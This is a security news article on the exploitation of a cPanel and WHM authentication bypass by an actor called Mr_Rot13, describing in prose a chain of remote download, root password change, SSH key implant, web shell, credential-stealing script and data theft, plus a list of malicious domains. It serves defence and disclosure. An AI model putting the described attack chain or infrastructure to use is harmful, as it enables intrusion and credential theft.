cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor

Summary

Threat actor Mr_Rot13 is exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel and WebHost Manager, to deploy a cross-platform backdoor called Filemanager. The attack chain modifies root credentials, implants SSH keys, injects malicious JavaScript to steal login credentials, and collects sensitive data including SSH keys and database passwords. QiAnXin XLab reports over 2,000 attacker IPs globally are conducting automated exploitation, with evidence suggesting the threat actor has been operating since at least 2020.

Full text

cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor Ravie LakshmananMay 11, 2026Vulnerability / Ransomware A threat actor named Mr_Rot13 has been attributed to the exploitation of a recently disclosed critical cPanel flaw to deploy a backdoor codenamed Filemanager on compromised environments. The attack exploits CVE-2026-41940, a vulnerability impacting cPanel and WebHost Manager (WHM) that could result in an authentication bypass and allow remote attackers to gain elevated control of the control panel. According to a new report from QiAnXin XLab, the security defect has been exploited by a number of threat actors shortly after its public disclosure late last month, resulting in malicious behaviors like cryptocurrency mining, ransomware, botnet propagation, and backdoor implantation. "Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability," XLab researchers said. "These IPs are distributed across multiple regions globally, primarily originating from Germany, the United States, Brazil, the Netherlands, and other regions." Further analysis of the ongoing exploitation activity has uncovered a shell script that uses wget or curl to download a Go-based infector from a remote server ("cp.dene.[de[.]com") that first modifies the compromised cPanel system's root password to "123Qwe123C," plants an SSH public key for persistent access, and then drops a PHP web shell that facilitates file upload/download and remote command execution. The web shell is then used to inject JavaScript code to serve a customized login page to steal login credentials and siphon them to an attacker-controlled system that's encoded using the ROT13 cipher ("wrned[.]com"). Once the details are transmitted, the attack chain culminates with the deployment of a cross-platform backdoor that's capable of infecting Windows, macOS, and Linux systems. The infector is also equipped to collect sensitive information from the compromised host, including bash history, SSH data, device information, database passwords, and cPanel virtual aliases (aka valiases), to a 3-member Telegram group created by a user named "0xWR." In the infection sequence analyzed by XLab, Filemanager is delivered via a shell script downloaded from the "wpsock[.]com" domain. The backdoor supports file management, remote command execution, and shell functionality. There are signs that the threat actor behind the operation has been operating silently in the shadows for years. This assessment is based on the fact that the command-and-control (C2) domain embedded in the JavaScript code has been put to use in a PHP-based backdoor ("helper.php") that was uploaded to the VirusTotal platform in April 2022. The domain was first registered in October 2020. "Over the six years from 2020 to the present, the detection rate of Mr_Rot13's related samples and infrastructure across security products has remained extremely low," XLab said. Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share Share SHARE  Authentication bypass, Backdoor, botnet, cPanel, Credential Theft, Cryptomining, cybersecurity, ransomware, Vulnerability, WebHost Manager ⚡ Top Stories This Week Ollama Out-of-Bounds Read Vulnerability Allows Remote Process Memory Leak Four OpenClaw Flaws Enable Data Theft, Privilege Escalation, and Persistence On-Prem Microsoft Exchange Server CVE-2026-42897 Exploited via Crafted Email Cisco Catalyst SD-WAN Controller Auth Bypass Actively Exploited to Gain Admin Access ThreatsDay Bulletin: PAN-OS RCE, Mythos cURL Bug, AI Tokenizer Attacks, and 10+ Stories Windows Zero-Days Expose BitLocker Bypasses And CTFMON Privilege Escalation New Fragnesia Linux Kernel LPE Grants Root Access via Page Cache Corruption 18-Year-Old NGINX Rewrite Module Flaw Enables Unauthenticated RCE Microsoft's MDASH AI System Finds 16 Windows Flaws Fixed in Patch Tuesday [Webinar] How Modern Attack Paths Cross Code, Pipelines, and Cloud Microsoft Patches 138 Vulnerabilities, Including DNS and Netlogon RCE Flaws New Exim BDAT Vulnerability Exposes GnuTLS Builds to Potential Code Execution Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI and More Packages cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor ⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More Hackers Used AI to Develop First Known Zero-Day 2FA Bypass for Mass Exploitation ⭐ Featured Resources [Webinar] Learn How to Handle Critical SOC Alerts With AI Support Identify Internal Attack Surfaces More Efficiently With a Free Assessment [eBook] Get the 3-Number SOC Diagnostic to Reduce Queue Risk [Guide] Stop Email Fraud Before It Turns Into Ransomware Damage

Indicators of Compromise

• cve — CVE-2026-41940
• domain — cp.dene.de.com
• domain — wrned.com
• domain — wpsock.com
• malware — Filemanager
• malware — helper.php

Entities